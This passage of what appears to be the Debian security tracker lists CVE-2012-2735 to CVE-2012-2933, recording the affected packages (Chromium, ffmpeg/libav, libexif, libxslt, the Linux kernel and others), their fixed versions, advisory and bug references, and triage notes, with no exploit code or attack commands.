{DSA-2501-1} - xen 4.1.3~rc1+hg-20120614.a9c0a89c08f2-1 CVE-2012-2933 RESERVED CVE-2012-2932 RESERVED CVE-2012-2931 RESERVED CVE-2012-2930 RESERVED CVE-2012-2929 RESERVED CVE-2011-5091 (Multiple SQL injection vulnerabilities in GR Board (aka grboard) ...) NOT-FOR-US: GR Board CVE-2011-5090 (GR Board (aka grboard) 1.8.6.5 Community Edition does not require ...) NOT-FOR-US: GR Board CVE-2012-2928 (The Gliffy plugin before 3.7.1 for Atlassian JIRA, and before 4.2 for ...) NOT-FOR-US: JIRA plugin CVE-2012-2927 (The TM Software Tempo plugin before 6.4.3.1, 6.5.x before 6.5.0.2, and ...) NOT-FOR-US: Atlassian JIRA CVE-2012-2926 (Atlassian JIRA before 5.0.1; Confluence before 3.5.16, 4.0 before ...) NOT-FOR-US: Atlassian JIRA CVE-2012-2925 (SQL injection vulnerability in engine.php in Simple PHP Agenda 2.2.8 ...) NOT-FOR-US: Simple PHP Agenda CVE-2012-2924 (PHP remote file inclusion vulnerability in admin/setup.inc.php in ...) NOT-FOR-US: Hypermethod eLearning Server 4G CVE-2012-2923 (SQL injection vulnerability in news.php4 in Hypermethod eLearning ...) NOT-FOR-US: Hypermethod eLearning Server 4G CVE-2012-2922 (The request_path function in includes/bootstrap.inc in Drupal 7.14 and ...) - drupal7 7.22-1 (unimportant) NOTE: Path disclosure irrelevant for Debian CVE-2012-2921 (Universal Feed Parser (aka feedparser or python-feedparser) before ...) - feedparser 5.1.2-1 (low; bug #674167) [squeeze] - feedparser (Minor issue) CVE-2012-2920 (Cross-site scripting (XSS) vulnerability in the userphoto_options_page ...) NOT-FOR-US: WordPress User Photo plugin CVE-2012-2919 (Directory traversal vulnerability in Upload/engine.php in Chevereto ...) NOT-FOR-US: Chevereto CVE-2012-2918 (Cross-site scripting (XSS) vulnerability in Upload/engine.php in ...) NOT-FOR-US: Chevereto CVE-2012-2917 (Cross-site scripting (XSS) vulnerability in the Share and Follow ...) 
NOT-FOR-US: WordPress Share and Follow plugin CVE-2012-2916 (Cross-site scripting (XSS) vulnerability in sabre_class_admin.php in ...) NOT-FOR-US: WordPress SABRE plugin CVE-2012-2915 (Stack-based buffer overflow in Lattice Semiconductor PAC-Designer ...) NOT-FOR-US: Lattice Semiconductor PAC-Designer CVE-2012-2914 (Cross-site scripting (XSS) vulnerability in captchademo.php in ...) NOT-FOR-US: Unijimpe Captcha CVE-2012-2913 (Multiple cross-site scripting (XSS) vulnerabilities in the Leaflet ...) NOT-FOR-US: WordPress Leaflet plugin CVE-2012-2912 (Multiple cross-site scripting (XSS) vulnerabilities in the ...) NOT-FOR-US: WordPress LeagueManager plugin CVE-2012-2911 (Cross-site scripting (XSS) vulnerability in backupDB.php in ...) NOT-FOR-US: SiliSoftware backupDB CVE-2012-2910 (Multiple cross-site scripting (XSS) vulnerabilities in SiliSoftware ...) NOT-FOR-US: SiliSoftware phpThumb CVE-2012-2909 (Multiple cross-site scripting (XSS) vulnerabilities in Viscacha ...) NOT-FOR-US: Viscacha CVE-2012-2908 (Multiple SQL injection vulnerabilities in admin/bbcodes.php in ...) NOT-FOR-US: Viscacha CVE-2012-2907 (Cross-site scripting (XSS) vulnerability in the aberdeen_breadcrumb ...) NOT-FOR-US: Drupal Aberdeen theme CVE-2012-2906 (Multiple cross-site scripting (XSS) vulnerabilities in ...) NOT-FOR-US: Artiphp CMS 5.5.0 Neo CVE-2012-2905 (Artiphp CMS 5.5.0 Neo (r422) stores database backups with predictable ...) NOT-FOR-US: Artiphp CMS CVE-2012-2904 (player.swf in LongTail JW Player 5.9 allows remote attackers to ...) NOT-FOR-US: LongTail JW Player CVE-2012-2903 (Multiple cross-site scripting (XSS) vulnerabilities in PHP Address ...) NOT-FOR-US: PHP Address Book CVE-2012-2902 (Unrestricted file upload vulnerability in ...) NOT-FOR-US: Joomla JCE CVE-2012-2901 (Cross-site scripting (XSS) vulnerability in the Profile List in the ...) NOT-FOR-US: Joomla JCE CVE-2012-2900 (Skia, as used in Google Chrome before 22.0.1229.92, does not properly ...) 
	- chromium-browser 22.0.1229.94~r161065-1
CVE-2012-2899
	RESERVED
CVE-2012-2898
	RESERVED
CVE-2012-2897 (The kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows ...)
	- chromium-browser (Windows-specific)
CVE-2012-2896 (Integer overflow in the WebGL implementation in Google Chrome before ...)
	- chromium-browser (MacOS X-specific)
CVE-2012-2895 (The PDF functionality in Google Chrome before 22.0.1229.79 allows ...)
	- chromium-browser (PDF viewer not included in Chromium)
CVE-2012-2894 (Google Chrome before 22.0.1229.79 does not properly handle ...)
	- chromium-browser 22.0.1229.94~r161065-1
CVE-2012-2893 (Double free vulnerability in libxslt, as used in Google Chrome before ...)
	{DSA-2555-1}
	- chromium-browser 22.0.1229.94~r161065-1
	- libxslt 1.1.26-14 (bug #689422)
CVE-2012-2892 (Unspecified vulnerability in Google Chrome before 22.0.1229.79 allows ...)
	- chromium-browser 22.0.1229.94~r161065-1
CVE-2012-2891 (The IPC implementation in Google Chrome before 22.0.1229.79 allows ...)
	- chromium-browser 22.0.1229.94~r161065-1
CVE-2012-2890 (Use-after-free vulnerability in the PDF functionality in Google Chrome ...)
	- chromium-browser (PDF viewer not included in Chromium)
CVE-2012-2889 (Cross-site scripting (XSS) vulnerability in Google Chrome before ...)
	- chromium-browser 22.0.1229.94~r161065-1
CVE-2012-2888 (Use-after-free vulnerability in Google Chrome before 22.0.1229.79 ...)
	- chromium-browser 22.0.1229.94~r161065-1
CVE-2012-2887 (Use-after-free vulnerability in Google Chrome before 22.0.1229.79 ...)
	- chromium-browser 22.0.1229.94~r161065-1
CVE-2012-2886 (Cross-site scripting (XSS) vulnerability in Google Chrome before ...)
	- chromium-browser 22.0.1229.94~r161065-1
CVE-2012-2885 (Double free vulnerability in Google Chrome before 22.0.1229.79 allows ...)
	- chromium-browser 22.0.1229.94~r161065-1
CVE-2012-2884 (Skia, as used in Google Chrome before 22.0.1229.79, allows remote ...)
	- chromium-browser 22.0.1229.94~r161065-1
CVE-2012-2883 (Skia, as used in Google Chrome before 22.0.1229.79, allows remote ...)
	- chromium-browser 22.0.1229.94~r161065-1
CVE-2012-2882 (FFmpeg, as used in Google Chrome before 22.0.1229.79, does not ...)
	- chromium-browser 22.0.1229.94~r161065-1
	- libav 6:0.8.5-1 (bug #694483)
	- ffmpeg
	[squeeze] - ffmpeg (vulnerable code not present)
	NOTE: https://chromiumcodereview.appspot.com/10829204
	NOTE: proposed patch for libav: http://patches.libav.org/patch/32636/
	NOTE: fixed with http://git.libav.org/?p=libav.git;a=commitdiff;h=7751e4693dd10ec98c20fbd9887233b575034272
CVE-2012-2881 (Google Chrome before 22.0.1229.79 does not properly handle plug-ins, ...)
	- chromium-browser 22.0.1229.94~r161065-1
CVE-2012-2880 (Race condition in Google Chrome before 22.0.1229.79 allows remote ...)
	- chromium-browser 22.0.1229.94~r161065-1
CVE-2012-2879 (Google Chrome before 22.0.1229.79 allows remote attackers to cause a ...)
	- chromium-browser 22.0.1229.94~r161065-1
CVE-2012-2878 (Use-after-free vulnerability in Google Chrome before 22.0.1229.79 ...)
	- chromium-browser 22.0.1229.94~r161065-1
CVE-2012-2877 (The extension system in Google Chrome before 22.0.1229.79 does not ...)
	- chromium-browser 22.0.1229.94~r161065-1
CVE-2012-2876 (Buffer overflow in the SSE2 optimization functionality in Google ...)
	- chromium-browser 22.0.1229.94~r161065-1
CVE-2012-2875 (Multiple unspecified vulnerabilities in the PDF functionality in ...)
	- chromium-browser (PDF viewer not included in Chromium)
CVE-2012-2874 (Skia, as used in Google Chrome before 22.0.1229.79, allows remote ...)
	- chromium-browser 22.0.1229.94~r161065-1
CVE-2012-2873
	RESERVED
CVE-2012-2872 (Cross-site scripting (XSS) vulnerability in an SSL interstitial page ...)
	- chromium-browser 21.0.1180.89~r154005-1
CVE-2012-2871 (libxml2 2.9.0-rc1 and earlier, as used in Google Chrome before ...)
	{DSA-2555-1}
	- chromium-browser 21.0.1180.89~r154005-1
	- libxslt 1.1.26-14 (bug #689422)
CVE-2012-2870 (libxslt 1.1.26 and earlier, as used in Google Chrome before ...)
	{DSA-2555-1}
	- chromium-browser 21.0.1180.89~r154005-1
	- libxslt 1.1.26-14 (bug #689422)
CVE-2012-2869 (Google Chrome before 21.0.1180.89 does not properly load URLs, which ...)
	- chromium-browser 21.0.1180.89~r154005-1
CVE-2012-2868 (Race condition in Google Chrome before 21.0.1180.89 allows remote ...)
	- chromium-browser 21.0.1180.89~r154005-1
CVE-2012-2867 (The SPDY implementation in Google Chrome before 21.0.1180.89 allows ...)
	- chromium-browser 21.0.1180.89~r154005-1
CVE-2012-2866 (Google Chrome before 21.0.1180.89 does not properly perform a cast of ...)
	- chromium-browser 21.0.1180.89~r154005-1
CVE-2012-2865 (Google Chrome before 21.0.1180.89 does not properly perform line ...)
	- chromium-browser 21.0.1180.89~r154005-1
CVE-2012-2864 (Mesa, as used in Google Chrome before 21.0.1183.0 on the Acer AC700, ...)
	- mesa 8.0.4-2 (bug #685667)
	[squeeze] - mesa (Vulnerable code not present)
CVE-2012-2863 (The PDF functionality in Google Chrome before 21.0.1180.75 allows ...)
	- chromium-browser (PDF functionality not present in Chromium)
CVE-2012-2862 (Use-after-free vulnerability in the PDF functionality in Google Chrome ...)
	- chromium-browser (PDF functionality not present in Chromium)
CVE-2012-2861
	RESERVED
CVE-2012-2860 (The date-picker implementation in Google Chrome before 21.0.1180.57 on ...)
	- chromium-browser 21.0.1180.57~r148591
	[squeeze] - chromium-browser
	NOTE: http://trac.webkit.org/changeset/122918
CVE-2012-2859 (Google Chrome before 21.0.1180.57 on Linux does not properly handle ...)
	- chromium-browser 21.0.1180.57~r148591
	[squeeze] - chromium-browser
CVE-2012-2858 (Buffer overflow in the WebP decoder in Google Chrome before ...)
	- chromium-browser 21.0.1180.57~r148591
	[squeeze] - chromium-browser
CVE-2012-2857 (Use-after-free vulnerability in the Cascading Style Sheets (CSS) DOM ...)
	- chromium-browser 21.0.1180.57~r148591
	[squeeze] - chromium-browser
CVE-2012-2856 (The PDF functionality in Google Chrome before 21.0.1180.57 on Mac OS X ...)
	- chromium-browser (PDF functionality not present in Chromium)
CVE-2012-2855 (Use-after-free vulnerability in the PDF functionality in Google Chrome ...)
	- chromium-browser (PDF functionality not present in Chromium)
CVE-2012-2854 (Google Chrome before 21.0.1180.57 on Mac OS X and Linux, and before ...)
	- chromium-browser 21.0.1180.57~r148591
	[squeeze] - chromium-browser
CVE-2012-2853 (The webRequest API in Google Chrome before 21.0.1180.57 on Mac OS X ...)
	- chromium-browser 21.0.1180.57~r148591
	[squeeze] - chromium-browser
CVE-2012-2852 (The PDF functionality in Google Chrome before 21.0.1180.57 on Mac OS X ...)
	- chromium-browser (PDF functionality not present in Chromium)
CVE-2012-2851 (Multiple integer overflows in the PDF functionality in Google Chrome ...)
	- chromium-browser (PDF functionality not present in Chromium)
CVE-2012-2850 (Multiple unspecified vulnerabilities in the PDF functionality in ...)
	- chromium-browser (PDF functionality not present in Chromium)
CVE-2012-2849 (Off-by-one error in the GIF decoder in Google Chrome before ...)
	- chromium-browser 21.0.1180.57~r148591
	[squeeze] - chromium-browser
CVE-2012-2848 (The drag-and-drop implementation in Google Chrome before 21.0.1180.57 ...)
	- chromium-browser 21.0.1180.57~r148591
	[squeeze] - chromium-browser
CVE-2012-2847 (Google Chrome before 21.0.1180.57 on Mac OS X and Linux, and before ...)
	- chromium-browser 21.0.1180.57~r148591
	[squeeze] - chromium-browser
CVE-2012-2846 (Google Chrome before 21.0.1180.57 on Linux does not properly isolate ...)
	- chromium-browser 21.0.1180.57~r148591
	[squeeze] - chromium-browser (minor issue)
CVE-2012-2845 (Integer overflow in the jpeg_data_load_data function in jpeg-data.c in ...)
	- exif 0.6.20-2 (low; bug #681465)
	[squeeze] - exif (Minor crasher)
	NOTE: https://bugzilla.novell.com/show_bug.cgi?id=771229
	NOTE: http://seclists.org/oss-sec/2012/q3/74
CVE-2012-2844 (The PDF functionality in Google Chrome before 20.0.1132.57 does not ...)
	- chromium-browser
CVE-2012-2843 (Use-after-free vulnerability in Google Chrome before 20.0.1132.57 ...)
	- chromium-browser 20.0.1132.57~r145807-1
	[squeeze] - chromium-browser
CVE-2012-2842 (Use-after-free vulnerability in Google Chrome before 20.0.1132.57 ...)
	- chromium-browser 20.0.1132.57~r145807-1
	[squeeze] - chromium-browser
CVE-2012-2841 (Integer underflow in the exif_entry_get_value function in exif-entry.c ...)
	{DSA-2559-1}
	- libexif 0.6.20-3 (bug #681454)
	NOTE: https://bugzilla.novell.com/show_bug.cgi?id=771229
	NOTE: http://seclists.org/oss-sec/2012/q3/74
CVE-2012-2840 (Off-by-one error in the exif_convert_utf16_to_utf8 function in ...)
	{DSA-2559-1}
	- libexif 0.6.20-3 (bug #681454)
	NOTE: https://bugzilla.novell.com/show_bug.cgi?id=771229
	NOTE: http://seclists.org/oss-sec/2012/q3/74
CVE-2012-2839
	RESERVED
CVE-2012-2838
	RESERVED
CVE-2012-2837 (The mnote_olympus_entry_get_value function in ...)
	{DSA-2559-1}
	- libexif 0.6.20-3 (bug #681454)
	NOTE: https://bugzilla.novell.com/show_bug.cgi?id=771229
	NOTE: http://seclists.org/oss-sec/2012/q3/74
CVE-2012-2836 (The exif_data_load_data function in exif-data.c in the EXIF Tag ...)
	{DSA-2559-1}
	- libexif 0.6.20-3 (bug #681454)
	NOTE: https://bugzilla.novell.com/show_bug.cgi?id=771229
	NOTE: http://seclists.org/oss-sec/2012/q3/74
CVE-2012-2835
	RESERVED
CVE-2012-2834 (Integer overflow in Google Chrome before 20.0.1132.43 allows remote ...)
	- chromium-browser 20.0.1132.43~r143823-1
	[squeeze] - chromium-browser
CVE-2012-2833 (Buffer overflow in the JS API in the PDF functionality in Google ...)
	- chromium-browser (PDF functionality not present in Chromium)
CVE-2012-2832 (The image-codec implementation in the PDF functionality in Google ...)
	- chromium-browser (PDF functionality not present in Chromium)
CVE-2012-2831 (Use-after-free vulnerability in Google Chrome before 20.0.1132.43 ...)
	- chromium-browser 20.0.1132.43~r143823-1
	[squeeze] - chromium-browser
CVE-2012-2830 (Google Chrome before 20.0.1132.43 does not properly set array values, ...)
	- chromium-browser 20.0.1132.43~r143823-1
	[squeeze] - chromium-browser
CVE-2012-2829 (Use-after-free vulnerability in the Cascading Style Sheets (CSS) ...)
	- chromium-browser 20.0.1132.43~r143823-1
CVE-2012-2828 (Multiple integer overflows in the PDF functionality in Google Chrome ...)
	- chromium-browser (PDF functionality not present in Chromium)
CVE-2012-2827 (Use-after-free vulnerability in the UI in Google Chrome before ...)
	- chromium-browser (MacOS specific)
CVE-2012-2826 (Google Chrome before 20.0.1132.43 does not properly implement texture ...)
	- chromium-browser 20.0.1132.43~r143823-1
	[squeeze] - chromium-browser
CVE-2012-2825 (The XSL implementation in Google Chrome before 20.0.1132.43 allows ...)
	- libxslt 1.1.26-13 (low; bug #679283)
	[squeeze] - libxslt 1.1.26-6+squeeze1
CVE-2012-2824 (Use-after-free vulnerability in Google Chrome before 20.0.1132.43 ...)
	- chromium-browser 20.0.1132.43~r143823-1
	[squeeze] - chromium-browser
CVE-2012-2823 (Use-after-free vulnerability in Google Chrome before 20.0.1132.43 ...)
	- chromium-browser 20.0.1132.43~r143823-1
	[squeeze] - chromium-browser
CVE-2012-2822 (The PDF functionality in Google Chrome before 20.0.1132.43 allows ...)
	- chromium-browser (PDF functionality not present in Chromium)
CVE-2012-2821 (The autofill implementation in Google Chrome before 20.0.1132.43 does ...)
	- chromium-browser 20.0.1132.43~r143823-1
	[squeeze] - chromium-browser
CVE-2012-2820 (Google Chrome before 20.0.1132.43 does not properly implement SVG ...)
	- chromium-browser 20.0.1132.43~r143823-1
	[squeeze] - chromium-browser
CVE-2012-2819 (The texSubImage2D implementation in the WebGL subsystem in Google ...)
	- chromium-browser 20.0.1132.43~r143823-1
	[squeeze] - chromium-browser
CVE-2012-2818 (Use-after-free vulnerability in Google Chrome before 20.0.1132.43 ...)
	- chromium-browser 20.0.1132.43~r143823-1
	[squeeze] - chromium-browser
CVE-2012-2817 (Use-after-free vulnerability in Google Chrome before 20.0.1132.43 ...)
	- chromium-browser 20.0.1132.43~r143823-1
	[squeeze] - chromium-browser
CVE-2012-2816 (Google Chrome before 20.0.1132.43 on Windows does not properly isolate ...)
	- chromium-browser (windows-only)
CVE-2012-2815 (Google Chrome before 20.0.1132.43 allows remote attackers to obtain ...)
	- chromium-browser 20.0.1132.43~r143823-1
	[squeeze] - chromium-browser (minor issue)
CVE-2012-2814 (Buffer overflow in the exif_entry_format_value function in ...)
	{DSA-2559-1}
	- libexif 0.6.20-3 (bug #681454)
	NOTE: https://bugzilla.novell.com/show_bug.cgi?id=771229
	NOTE: http://seclists.org/oss-sec/2012/q3/74
CVE-2012-2813 (The exif_convert_utf16_to_utf8 function in exif-entry.c in the EXIF ...)
	{DSA-2559-1}
	- libexif 0.6.20-3 (bug #681454)
	NOTE: https://bugzilla.novell.com/show_bug.cgi?id=771229
	NOTE: http://seclists.org/oss-sec/2012/q3/74
CVE-2012-2812 (The exif_entry_get_value function in exif-entry.c in the EXIF Tag ...)
	{DSA-2559-1}
	- libexif 0.6.20-3 (bug #681454)
	NOTE: https://bugzilla.novell.com/show_bug.cgi?id=771229
	NOTE: http://seclists.org/oss-sec/2012/q3/74
CVE-2012-2811
	RESERVED
CVE-2012-2810
	RESERVED
CVE-2012-2809
	RESERVED
CVE-2012-2808
	RESERVED
CVE-2012-2807 (Multiple integer overflows in libxml2, as used in Google Chrome before ...)
	{DSA-2521-1}
	- libxml2 2.8.0+dfsg1-5 (bug #679280)
	NOTE: http://git.chromium.org/gitweb/?p=chromium/src.git;a=patch;h=f183580d61c054f7f6bb35cfe29e1b342390fbebcd
CVE-2012-2806 (Heap-based buffer overflow in the get_sos function in jdmarker.c in ...)
	- libjpeg-turbo (bug #612341)
CVE-2012-2805
	RESERVED
CVE-2012-2804 (Unspecified vulnerability in libavcodec/indeo3.c in FFmpeg before 0.11 ...)
	- ffmpeg (bug #688849)
	- libav 6:0.8.5-1 (bug #688847)
	[squeeze] - ffmpeg (vulnerable code not present)
CVE-2012-2803 (Double free vulnerability in the mpeg_decode_frame function in ...)
	{DSA-2624-1}
	- ffmpeg (bug #688849)
	- libav 6:0.8.5-1 (bug #688847)
	[squeeze] - ffmpeg 4:0.5.10-1 (bug #688849)
CVE-2012-2802 (Unspecified vulnerability in the ac3_decode_frame function in ...)
	[squeeze] - ffmpeg (bug #688849)
	- libav 6:0.8.4-1 (bug #688847)
CVE-2012-2801 (Unspecified vulnerability in libavcodec/avs.c in FFmpeg before 0.11, ...)
	{DSA-2624-1}
	- libav 6:0.8.4-1 (bug #688847)
	- ffmpeg
	[squeeze] - ffmpeg 4:0.5.10-1 (bug #688849)
CVE-2012-2800 (Unspecified vulnerability in the ff_ivi_process_empty_tile function in ...)
	[squeeze] - ffmpeg (bug #688849)
	- libav 6:0.8.4-1 (bug #688847)
CVE-2012-2799 (Unspecified vulnerability in libavcodec/wmalosslessdec.c in FFmpeg ...)
	- libav (Vulnerable code not present in 0.8 version from unstable, fixed in 0.9 version in experimental)
	- ffmpeg (Vulnerable code not present)
CVE-2012-2798 (Unspecified vulnerability in the decode_dds1 function in ...)
	[squeeze] - ffmpeg (bug #688849)
	- libav 6:0.8.4-1 (bug #688847)
CVE-2012-2797 (Unspecified vulnerability in the decode_frame_mp3on4 function in ...)
	- ffmpeg (bug #688849)
	- libav 6:0.8.5-1 (bug #688847)
	[squeeze] - ffmpeg (vulnerable code not present)
	NOTE: patch proposed: http://patches.libav.org/patch/32642/
CVE-2012-2796 (Unspecified vulnerability in the vc1_decode_frame function in ...)
	[squeeze] - ffmpeg (bug #688849)
	- libav 6:0.8.4-1 (bug #688847)
CVE-2012-2795 (Multiple unspecified vulnerabilities in libavcodec/wmalosslessdec.c in ...)
	- libav (Vulnerable code not present in 0.8 version from unstable, fixed in 0.9 version in experimental)
	- ffmpeg (Vulnerable code not present)
CVE-2012-2794 (Unspecified vulnerability in the decode_mb_info function in ...)
	[squeeze] - ffmpeg (bug #688849)
	- libav 6:0.8.4-1 (bug #688847)
CVE-2012-2793 (Unspecified vulnerability in the lag_decode_zero_run_line function in ...)
	[squeeze] - ffmpeg (bug #688849)
	- libav 6:0.8.4-1 (bug #688847)
CVE-2012-2792 (Unspecified vulnerability in the decode_init function in ...)
	- libav (Vulnerable code not present in 0.8 version from unstable, fixed in 0.9 version in experimental)
	- ffmpeg (Vulnerable code not present)
CVE-2012-2791 (Multiple unspecified vulnerabilities in the (1) decode_band_hdr ...)
	[squeeze] - ffmpeg (bug #688849)
	- libav 6:0.8.5-1 (bug #688847)
CVE-2012-2790 (Unspecified vulnerability in the read_var_block_data function in ...)
	[squeeze] - ffmpeg (bug #688849)
	- libav 6:0.8.4-1 (bug #688847)
CVE-2012-2789 (Unspecified vulnerability in the avi_read_packet function in ...)
	[squeeze] - ffmpeg (bug #688849)
	- libav 6:0.8.4-1 (bug #688847)
	NOTE: contrary to the description, this issue is about the decode_subframe in libavcodec/wmaprodec.c
CVE-2012-2788 (Unspecified vulnerability in the avi_read_packet function in ...)
	{DSA-2624-1}
	[squeeze] - ffmpeg 4:0.5.10-1 (bug #688849)
	- libav 6:0.8.4-1 (bug #688847)
	- ffmpeg
CVE-2012-2787 (Unspecified vulnerability in the decode_frame function in ...)
	[squeeze] - ffmpeg (bug #688849)
	- libav 6:0.8.4-1 (bug #688847)
CVE-2012-2786 (Unspecified vulnerability in the decode_wdlt function in ...)
	[squeeze] - ffmpeg (bug #688849)
	- libav 6:0.8.4-1 (bug #688847)
CVE-2012-2785 (Multiple unspecified vulnerabilities in libavcodec/wmalosslessdec.c in ...)
	- libav (Vulnerable code not present in 0.8 version from unstable, fixed in 0.9 version in experimental)
	- ffmpeg (Vulnerable code not present)
CVE-2012-2784 (Unspecified vulnerability in the decode_pic function in ...)
	{DSA-2624-1}
	[squeeze] - ffmpeg 4:0.5.10-1 (bug #688849)
	- libav 6:0.8.4-1 (bug #688847)
	- ffmpeg
	NOTE: duplicate of CVE-2012-2777
	TODO: mark this properly as duplicate
CVE-2012-2783 (Unspecified vulnerability in libavcodec/vp56.c in FFmpeg before 0.11, ...)
	{DSA-2624-1}
	- ffmpeg (bug #688849)
	- libav 6:0.8.5-1 (bug #688847)
	[squeeze] - ffmpeg 4:0.5.10-1 (bug #688849)
CVE-2012-2782 (Unspecified vulnerability in the decode_slice_header function in ...)
	- libav (Doesn't affect libav)
CVE-2012-2781
	RESERVED
CVE-2012-2780
	RESERVED
CVE-2012-2779 (Unspecified vulnerability in the decode_frame function in ...)
	- ffmpeg
	[squeeze] - ffmpeg (Vulnerable code not present, bug #688849)
	- libav 6:0.8.4-1 (bug #688847)
CVE-2012-2778
	RESERVED
CVE-2012-2777 (Unspecified vulnerability in the decode_pic function in ...)
	{DSA-2624-1}
	[squeeze] - ffmpeg 4:0.5.9-1 (bug #688849)
	- libav 6:0.8.4-1 (bug #688847)
	- ffmpeg
CVE-2012-2776 (Unspecified vulnerability in the decode_cell_data function in ...)
	- ffmpeg
	[squeeze] - ffmpeg (Vulnerable code not present, bug #688849)
	- libav 6:0.8.4-1 (bug #688847)
CVE-2012-2775 (Unspecified vulnerability in the read_var_block_data function in ...)
	- ffmpeg
	[squeeze] - ffmpeg (Vulnerable code not present, bug #688849)
	- libav 6:0.8.4-1 (bug #688847)
CVE-2012-2774 (The ff_MPV_frame_start function in libavcodec/mpegvideo.c in FFmpeg ...)
	- ffmpeg (there is no crash, just a couple uninitialized reads, harmless according to Janne)
	- libav (there is no crash, just a couple uninitialized reads, harmless according to Janne)
	NOTE: http://git.videolan.org/?p=ffmpeg.git;a=commitdiff;h=59a4b73531428d2f420b4dad545172c8483ced0f
	NOTE: patch proposed: http://patches.libav.org/patch/32644/
CVE-2012-2773
	RESERVED
CVE-2012-2772 (Unspecified vulnerability in the ff_rv34_decode_frame function in ...)
	- ffmpeg
	[squeeze] - ffmpeg (Vulnerable code not present, bug #688849)
	- libav 6:0.8.4-1 (bug #688847)
CVE-2012-2771
	RESERVED
CVE-2012-2770 (The Authen::ExternalAuth extension before 0.11 for Best Practical ...)
	- rt-authen-externalauth 0.10-2 (bug #683288)
CVE-2012-2769 (Multiple cross-site scripting (XSS) vulnerabilities in the topic ...)
	- request-tracker4 4.0.6-1
	NOTE: bundled in RT4
CVE-2012-2768 (Multiple cross-site scripting (XSS) vulnerabilities in the topic ...)
	{DSA-2535-1}
	- rtfm (bug #683290)
	- request-tracker4 4.0.6-1
	NOTE: bundled in RT4
CVE-2012-2767
	RESERVED
CVE-2012-2766
	RESERVED
CVE-2012-2765
	RESERVED
CVE-2012-2764 (Untrusted search path vulnerability in Google Chrome before ...)
	- chromium-browser (Windows specific)
CVE-2012-2763 (Buffer overflow in the readstr_upto function in ...)
	- gimp 2.8.0-1 (low)
	[squeeze] - gimp (Only exploitable in rare setups)
	NOTE: http://www.openwall.com/lists/oss-security/2012/05/31/1
	NOTE: http://www.reactionpenetrationtesting.co.uk/advisories/scriptfu-buffer-overflow-GIMP-2.6.html
	NOTE: http://www.reactionpenetrationtesting.co.uk/advisories/scriptfubof.c
CVE-2012-2762 (SQL injection vulnerability in include/functions_trackbacks.inc.php in ...)
	- serendipity (vulnerable code not present in 1.5.1, see bug #678139)
CVE-2012-2761
	RESERVED
CVE-2012-2760 (mod_auth_openid before 0.7 for Apache uses world-readable permissions ...)
	- libapache2-mod-auth-openid 0.7-0.1 (low; bug #674165)
	[squeeze] - libapache2-mod-auth-openid (Minor issue)
CVE-2012-2759 (Cross-site scripting (XSS) vulnerability in login-with-ajax.php in the ...)
	NOT-FOR-US: Wordpress plugin
CVE-2012-2758
	RESERVED
CVE-2012-2757
	RESERVED
CVE-2012-2756
	RESERVED
CVE-2012-2755
	RESERVED
CVE-2012-2754
	RESERVED
CVE-2012-2753 (Untrusted search path vulnerability in TrGUI.exe in the Endpoint ...)
	NOT-FOR-US: Endpoint Connect
CVE-2012-2752 (Untrusted search path vulnerability in VMware vMA 4.x and 5.x before ...)
	NOT-FOR-US: VMware
CVE-2012-2751 (ModSecurity before 2.6.6, when used with PHP, does not properly handle ...)
	{DSA-2506-1}
	- modsecurity-apache 2.6.6-1 (bug #678527)
	- libapache-mod-security (bug #678529)
	NOTE: http://www.openwall.com/lists/oss-security/2012/06/22/1
	NOTE: http://www.openwall.com/lists/oss-security/2012/06/22/2
CVE-2012-2750 (Unspecified vulnerability in MySQL 5.5.x before 5.5.23 has unknown ...)
	- mysql-5.5 5.5.24+dfsg-1
CVE-2012-2749 (MySQL 5.1.x before 5.1.63 and 5.5.x before 5.5.24 allows remote ...)
	{DSA-2496-1}
	- mysql-5.1
	- mysql-5.5 5.5.24+dfsg-1
CVE-2012-2748 (Unspecified vulnerability in Joomla! 2.5.x before 2.5.5 allows remote ...)
	- joomla (bug #571794)
CVE-2012-2747 (Unspecified vulnerability in Joomla! 2.5.x before 2.5.5 allows remote ...)
	- joomla (bug #571794)
CVE-2012-2746 (389 Directory Server before 1.2.11.6 (aka Red Hat Directory Server ...)
	- 389-ds-base (Fixed before initial upload)
CVE-2012-2745 (The copy_creds function in kernel/cred.c in the Linux kernel before ...)
	- linux 3.2.15-1
	- linux-2.6
	[squeeze] - linux-2.6 2.6.32-46
CVE-2012-2744 (net/ipv6/netfilter/nf_conntrack_reasm.c in the Linux kernel before ...)
	- linux 2.6.34-1
	- linux-2.6
	[squeeze] - linux-2.6 2.6.32-36
CVE-2012-2743 (Revelation 0.4.13-2 and earlier does not iterate through SHA hashing ...)
	- revelation 0.4.11-10 (low; bug #633088)
	[squeeze] - revelation (Minor issue)
	NOTE: http://www.openwall.com/lists/oss-security/2012/06/18/1
CVE-2012-2742 (Revelation 0.4.13-2 and earlier uses only the first 32 characters of a ...)
	- revelation 0.4.11-10 (bug #633088)
	[squeeze] - revelation (Minor issue)
	NOTE: http://www.openwall.com/lists/oss-security/2012/06/18/1
CVE-2012-2741 (Cross-site scripting (XSS) vulnerability in public_html/lists/admin/ ...)
	NOT-FOR-US: phplist
CVE-2012-2740 (SQL injection vulnerability in public_html/lists/admin in phpList ...)
	NOT-FOR-US: phplist
CVE-2012-2739 (Oracle Java SE before 7 Update 6, and OpenJDK 7 before 7u6 build 12 ...)
	- openjdk-6
	- openjdk-7
	NOTE: http://mail.openjdk.java.net/pipermail/core-libs-dev/2012-May/010238.html
	NOTE: http://armoredbarista.blogspot.de/2012/02/investigating-hashdos-issue.html
	NOTE: http://www.openwall.com/lists/oss-security/2012/06/15/12
	NOTE: http://www.openwall.com/lists/oss-security/2012/06/17/1
CVE-2012-2738 (The VteTerminal in gnome-terminal (vte) before 0.32.2 allows remote ...)
	- vte 1:0.28.2-5 (bug #677717)
	- vte3 1:0.32.2-1
	[squeeze] - vte 1:0.24.3-4
CVE-2012-2737 (The user_change_icon_file_authorized_cb function in ...)
	- accountsservice 0.6.21-6 (bug #679429)
	NOTE: http://www.openwall.com/lists/oss-security/2012/06/28/9
	NOTE: http://cgit.freedesktop.org/accountsservice/commit/?id=69b526a6cd4c078732068de2ba393cf9242a404b
	NOTE: https://bugzilla.redhat.com/show_bug.cgi?id=832532
CVE-2012-2736 [NetworkManager: creating new WPA-secured wireless network results in insecure network being created instead]
	RESERVED
	- network-manager 0.9.4.0-1 (low; bug #655972)
	[squeeze] - network-manager 0.8.1-6+squeeze2
CVE-2012-2735 (Session fixation vulnerability in Cumin before 0.1.5444, as used in ...)
	NOT-FOR-US: Cumin
